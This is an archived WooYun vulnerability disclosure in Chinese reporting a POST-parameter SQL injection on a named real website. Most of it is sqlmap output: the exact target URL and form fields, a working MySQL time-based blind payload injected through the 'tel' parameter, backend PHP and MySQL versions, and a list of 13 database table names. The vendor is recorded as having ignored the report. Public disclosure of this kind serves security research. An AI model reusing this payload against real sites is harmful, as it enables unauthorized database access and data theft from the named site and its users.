乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-07: 细节已通知厂商并且等待厂商处理中 2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开
仅仅是post注入 13个表
target:http://sc.huatu.com:80/zt/shaifen/jieguo.php (POST)name=123&tel=123&beizhu=123&huifang=123&diqu=%E9%9B%85%E5%AE%89%E5%B8%82&chafen=%E6%99%92%E4%B8%80%E6%99%92
sqlmap identified the following injection point(s) with a total of 329 HTTP(s) requests:---Parameter: tel (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: name=123&tel=123' AND (SELECT * FROM (SELECT(SLEEP(5)))LNba) AND 'YlyG'='YlyG&beizhu=123&huifang=123&diqu=%E9%9B%85%E5%AE%89%E5%B8%82&chafen=%E6%99%92%E4%B8%80%E6%99%92---web application technology: PHP 5.3.27back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: tel (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: name=123&tel=123' AND (SELECT * FROM (SELECT(SLEEP(5)))LNba) AND 'YlyG'='YlyG&beizhu=123&huifang=123&diqu=%E9%9B%85%E5%AE%89%E5%B8%82&chafen=%E6%99%92%E4%B8%80%E6%99%92---web application technology: PHP 5.3.27back-end DBMS: MySQL 5.0.12Database: test[13 tables]+---------------+| 2015gxsf || 2015sbds || 2015scsf || 2015wsj_game1 || 2015wsj_game2 || 2015ztxz || get_ip || gz_info || jilin_duanxin || jilin_kq30 || jilin_mssk || jilin_mszt || jilin_skmijq |+---------------+
基于时间 没有继续深入
危害等级:无影响厂商忽略
忽略时间:2015-11-12 09:54
漏洞Rank:4 (WooYun评价)
暂无